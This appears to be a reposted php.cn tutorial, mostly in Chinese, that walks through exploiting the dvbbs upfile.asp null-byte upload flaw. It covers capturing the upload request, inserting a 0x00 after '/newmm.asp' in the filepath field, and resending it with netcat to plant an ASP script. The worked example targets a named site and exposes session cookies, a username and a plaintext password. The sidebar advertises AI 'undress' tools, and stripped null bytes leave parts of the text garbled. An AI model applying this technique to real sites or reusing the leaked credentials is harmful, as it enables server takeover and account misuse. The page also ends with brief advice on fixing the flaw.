Exploring PHP and ASP Upload Vulnerabilities_PHP Tutorial-PHP Tutorial-php.cn

Home

Backend Development

PHP Tutorial

Exploring PHP and ASP Upload Vulnerabilities_PHP Tutorial

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jul 15, 2016 pm 01:23 PM

asp form php upload principle and Explore Format loopholes use of

1 传漏洞利用的原理只是针对form格式上传的asp和php脚本***

nc(netcat)
用于提交数据包
dos界面下运行:
nc -vv www.***.com 80-vv: 回显
80: www端口
1.txt: 就是你要发送的数据包 (更多使用方法请查看本区的帖子)
wse(wsockexpert) 对本机端口的监视,抓取ie提交的数据包

2 漏洞原理

下面例子假设的前提

www主机: www.***.com;
bbs路径 : /bbs/
漏洞源于对动网上传文件的研究,建议有一定编程经验的看看dvbbs的upfile.asp文件,没有必要全部看懂。upfile是通过生成一个form表上传,如下

Copy after login

用到的变量:：

filepath 默认值uploadface 属性hiden
act 默认值upload 属性hiden
file1 就是你要传的那个文件

关键是 filepath 这个变量!

默认情况下我们的文件上传到www.***.com/bbs/uploadface/

文件是用你的上传时间命名的,就是upfile里的这一句

filename=formpath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&rannum&"."&fileext
--------------------------------------

我们知道计算机里面的数据是一""为标致的用过c语言的都知道：char data[]="bbs" 这个data数组长度是4: b b s
如果我们构造filepath如下,会怎么样呢?

filepath="/newmm.asp"
我们在2004.09.24.08.24传的文件就会发生变化没有改时:：_blank>http://www.***.com/bbs/uploadface/200409240824.jpg 用我们构造的filepath时：_blank>http://www.***.com/newmm.asp/200409240824.jpg

这样当服务器接收filepath数据时,检测到newmm.asp后面的就理解为filepath的数据就结束了。这样我们上传的文件,比如c:.asp 就保存成: _blank>http://www.***.com/newmm.asp

3 后期补充

漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行。有很多网站只是加了n个hiden属性的变量对付网上公布的upfile.exe就是那个上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具。自己改wse抓到的包里的filepath变量,然后在用nc提交。就算他加n个hiden变量也于事无补。当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结就是我们的新理论诞生的时候!

4 详细实例
一、wse抓包结果(存到1.txt里)：

<p>post /bbs/upphoto/upfile.asp http/1.1 <br>accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, </p><p>application/x-shockwave-flash, application/vnd.ms-excel,</p><p>application/vnd.ms-powerpoint, application/msword, */* <br>referer: _blank>http://www.xin126.com/bbs/upphoto/upload.asp <br>accept-language: zh-cn <br>content-type: multipart/form-data; </p><p>boundary=-----------7d423a138d0278 <br>accept-encoding: gzip, deflate <br>user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; .net clr 1.1.4322) <br>host: _blank>www.xin126.com <br>content-length: 1969 <br>connection: keep-alive <br>cache-control: no-cache <br>cookie: aspsessionidaccccdcs=njhcphpalbcankobechkjanf; </p><p>iscome=1; gamvancookies=1; regtime=2004%2d9%2d24+3%3a39%3a37; </p><p>username=szjwwwww; pass=5211314; dl=0; userid=62; </p><p>ltstyle=0; logintry=1; userpass=eb03f6c72908fd84 </p><p>-----------------------------7d423a138d0278 <br>content-disposition: form-data; name="filepath" </p><p>../medias/myphoto/ <br>-----------------------------7d423a138d0278 <br>... ... </p>

Copy after login

上传
---------------7d423a138d0278-----------------

二、ultraedit打开1.txt改数据：

...... <br>-----------------------------7d423a138d0278 <br>content-disposition: form-data; name="filepath" <br>/newmm.asp ...... <br>----------------------------

Copy after login

三、重新计算cookies长度,然后nc提交

nc -vv _blank>www.xin126.com 80

ultraedit是一个16位编辑器网上可以下载得到
我们主要用来写那个结束标致: ====>16位表示:0x00或者00h
其实你改的时候就直接再filepath的结尾处加个00就ok了

计算cookies长度===>你把fillepath改了之后、肯定是或＋或—cookies的长度变了

<br>...... <br>host: _blank>www.xin126.com <br>content-length: 1969 connection: keep-alive <br>cache-control: no-cache <br>......

Copy after login

计算会吧?一个字母、数字就是1

对于上传漏洞提出的解决思路：(仅供参考)

1、一般的上传是把上传路径作为一个变量来处理
===>我们的对策就是把filepath变成常量。。。
这个方法是目前最有效的(我认为的)

2、加强对于的处理,原来我们是读到这里就结束
我们继续读直道下一个变量开始的地方，处理就ok了

附：NC Usage:

<p>监听外部主机 <br>nc [-options] hostname port[s] [ports] ... <br>监听本地主机 <br>nc -l -p port [options] [hostname] [port] <br>options: <br>-d detach from console, stealth mode <br>-e prog inbound program to exec [dangerous!!] <br>-g gateway source-routing hop point[s], up to 8 <br>-g num source-routing pointer: 4, 8, 12, ... <br>-h this cruft <br>-i secs delay interval for lines sent, ports scanned <br>-l listen mode, for inbound connects <br>-l listen harder, re-listen on socket close <br>-n numeric-only ip addresses, no dns <br>-o file hex dump of traffic <br>-p port local port number <br>-r randomize local and remote ports <br>-s addr local source address <br>-t answer telnet negotiation <br>-u udp mode <br>-v verbose [use twice to be more verbose] <br>-w secs timeout for connects and final net reads <br>-z zero-i/o mode [used for scanning] <br>port numbers can be individual or ranges: m-n [inclusive] </p>

Copy after login

(Editor:

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress images for free

Clothoff.io

AI clothes remover

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Article

How to fix KB5055612 fails to install in Windows 10?

4 weeks ago By DDD

Roblox: Grow A Garden - Complete Mutation Guide

3 weeks ago By DDD

Roblox: Bubble Gum Simulator Infinity - How To Get And Use Royal Keys

4 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Nordhold: Fusion System, Explained

4 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Mandragora: Whispers Of The Witch Tree - How To Unlock The Grappling Hook

3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

God-level code editing software (SublimeText3)

Hot Topics

Java Tutorial

1670

CakePHP Tutorial

1428

Laravel Tutorial

1329

PHP Tutorial

1276

C# Tutorial

1256

Related knowledge

PHP vs. Python: Understanding the Differences Apr 11, 2025 am 12:15 AM

PHP and Python each have their own advantages, and the choice should be based on project requirements. 1.PHP is suitable for web development, with simple syntax and high execution efficiency. 2. Python is suitable for data science and machine learning, with concise syntax and rich libraries.

PHP: A Key Language for Web Development Apr 13, 2025 am 12:08 AM

PHP is a scripting language widely used on the server side, especially suitable for web development. 1.PHP can embed HTML, process HTTP requests and responses, and supports a variety of databases. 2.PHP is used to generate dynamic web content, process form data, access databases, etc., with strong community support and open source resources. 3. PHP is an interpreted language, and the execution process includes lexical analysis, grammatical analysis, compilation and execution. 4.PHP can be combined with MySQL for advanced applications such as user registration systems. 5. When debugging PHP, you can use functions such as error_reporting() and var_dump(). 6. Optimize PHP code to use caching mechanisms, optimize database queries and use built-in functions. 7

PHP and Python: Comparing Two Popular Programming Languages Apr 14, 2025 am 12:13 AM

PHP and Python each have their own advantages, and choose according to project requirements. 1.PHP is suitable for web development, especially for rapid development and maintenance of websites. 2. Python is suitable for data science, machine learning and artificial intelligence, with concise syntax and suitable for beginners.

PHP in Action: Real-World Examples and Applications Apr 14, 2025 am 12:19 AM

PHP is widely used in e-commerce, content management systems and API development. 1) E-commerce: used for shopping cart function and payment processing. 2) Content management system: used for dynamic content generation and user management. 3) API development: used for RESTful API development and API security. Through performance optimization and best practices, the efficiency and maintainability of PHP applications are improved.

The Enduring Relevance of PHP: Is It Still Alive? Apr 14, 2025 am 12:12 AM

PHP is still dynamic and still occupies an important position in the field of modern programming. 1) PHP's simplicity and powerful community support make it widely used in web development; 2) Its flexibility and stability make it outstanding in handling web forms, database operations and file processing; 3) PHP is constantly evolving and optimizing, suitable for beginners and experienced developers.

PHP and Python: Different Paradigms Explained Apr 18, 2025 am 12:26 AM

PHP is mainly procedural programming, but also supports object-oriented programming (OOP); Python supports a variety of paradigms, including OOP, functional and procedural programming. PHP is suitable for web development, and Python is suitable for a variety of applications such as data analysis and machine learning.

PHP vs. Other Languages: A Comparison Apr 13, 2025 am 12:19 AM

PHP is suitable for web development, especially in rapid development and processing dynamic content, but is not good at data science and enterprise-level applications. Compared with Python, PHP has more advantages in web development, but is not as good as Python in the field of data science; compared with Java, PHP performs worse in enterprise-level applications, but is more flexible in web development; compared with JavaScript, PHP is more concise in back-end development, but is not as good as JavaScript in front-end development.

PHP and Python: Code Examples and Comparison Apr 15, 2025 am 12:07 AM

PHP and Python have their own advantages and disadvantages, and the choice depends on project needs and personal preferences. 1.PHP is suitable for rapid development and maintenance of large-scale web applications. 2. Python dominates the field of data science and machine learning.

See all articles